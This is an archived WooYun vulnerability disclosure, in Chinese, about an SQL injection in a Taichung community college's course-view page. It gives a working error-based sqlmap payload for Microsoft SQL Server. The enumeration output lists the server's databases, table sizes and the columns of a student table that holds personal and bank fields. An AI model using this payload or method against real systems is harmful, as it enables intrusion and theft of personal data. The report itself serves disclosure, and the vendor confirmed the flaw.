当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0159763

漏洞标题:臺中市山線社區大學sql注入/21个表(臺灣地區)

相关厂商:臺中市山線社區大學

漏洞作者: 路人甲

提交时间:2015-12-10 15:51

修复时间:2016-01-28 17:39

公开时间:2016-01-28 17:39

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-10: 细节已通知厂商并且等待厂商处理中
2015-12-14: 厂商已经确认,细节仅向厂商公开
2015-12-24: 细节向核心白帽子及相关领域专家公开
2016-01-03: 细节向普通白帽子公开
2016-01-13: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

详细说明:

注入点:http://**.**.**.**/cc2/courseview.asp?classnum=CC10326

sqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:
---
Parameter: classnum (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: classnum=CC10326' AND 7817=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7817=7817) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113))) AND 'Uwnu'='Uwnu
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
current database: 'ec2'
current user is DBA: False
available databases [21]:
[*] account
[*] AdventureWorks
[*] AdventureWorksDW
[*] DB_hr
[*] DB_Question
[*] ec2
[*] ec3
[*] labor
[*] labor_coop
[*] MagicDocDB
[*] master
[*] model
[*] msdb
[*] ppactivity
[*] prothrows
[*] tempdb
[*] texam_bicy
[*] twcb
[*] wealthy
[*] wealthy1
[*] young_plan


数据库太多了,随便看几个吧:

Database: ec2
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| dbo.regist_detail | 197101 |
| dbo.regist | 178810 |
| dbo.pay_d | 177568 |
| dbo.Vregnum | 161700 |
| dbo.Ucard | 122185 |
| dbo.course_report | 108840 |
| dbo.student | 79289 |
| dbo.Rd_card | 66597 |
| dbo.pay_m | 52283 |
| dbo.course | 37117 |
| dbo.web_student | 34592 |
| dbo.Add3 | 27744 |
| dbo.sys_record | 24597 |
| dbo.sortcourse | 23294 |
| dbo.Ucardprint | 16849 |
| dbo.web_regist | 16189 |
| dbo.s01_reader | 12430 |
| dbo.web_regist_detail | 11633 |
| dbo.deposit | 5043 |
| dbo.customer | 4455 |
| dbo.salary | 4425 |
| dbo.teacher | 4312 |
| dbo.teacher_bak | 3217 |
| dbo.s02_reader | 2176 |
| dbo.lack | 2139 |
| dbo.class | 1827 |
| dbo.slabor_reader | 1418 |
| dbo.question | 1259 |
| dbo.web_regist_detail_tqc | 1092 |
| dbo.S02_sentrecord | 917 |
| dbo.Rd_card2 | 849 |
| dbo.web_student_tqc | 818 |
| dbo.web_regist_tqc | 704 |
| dbo.Tick_seq | 532 |
| dbo.class_kind | 484 |
| dbo.cmail | 368 |
| dbo.Add2 | 366 |
| dbo.member | 336 |
| dbo.Assign_work | 243 |
| dbo.s01_enews | 166 |
| dbo.apply | 82 |
| dbo.department | 56 |
| dbo.sysform | 54 |
| dbo.place_base | 27 |
| dbo.Add1 | 26 |
| dbo.meet_company | 23 |
| dbo.FT_User | 20 |
| dbo.users | 17 |
| dbo.do_unit | 16 |
| dbo.s02_enews | 15 |
| dbo.agio | 13 |
| dbo.class_board | 11 |
| dbo.charge_set | 6 |
| dbo.dep | 5 |
| dbo.grade | 3 |
| dbo.lease_data | 2 |
| dbo.usergroup | 2 |
| dbo.app_data | 1 |
| dbo.counters | 1 |
| dbo.inschool | 1 |
| dbo.System | 1 |
| dbo.ucard_ad | 1 |
| dbo.web_counters | 1 |
+---------------------------+---------+


Database: ec2
Table: student
[34 columns]
+-------------+---------+
| Column | Type |
+-------------+---------+
| academic | varchar |
| add_c | varchar |
| b_b_call | varchar |
| bank | varchar |
| bankid | varchar |
| birthday | varchar |
| cell_call | varchar |
| company | varchar |
| company_add | varchar |
| company_zip | varchar |
| dept_id | varchar |
| duty | varchar |
| email | varchar |
| fax | varchar |
| finish | varchar |
| grade_date | varchar |
| how1 | bit |
| how2 | bit |
| how3 | bit |
| how4 | bit |
| id | varchar |
| keyin | varchar |
| memo | varchar |
| name | varchar |
| s_date | varchar |
| s_duty | varchar |
| s_level | varchar |
| s_number | varchar |
| school | varchar |
| seq | varchar |
| slevel | int |
| tel_h | varchar |
| tel_o | varchar |
| zip | varchar |
+-------------+---------+


看点信息:

111111111111.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-12-14 23:29

厂商回复:

感謝通報

最新状态:

暂无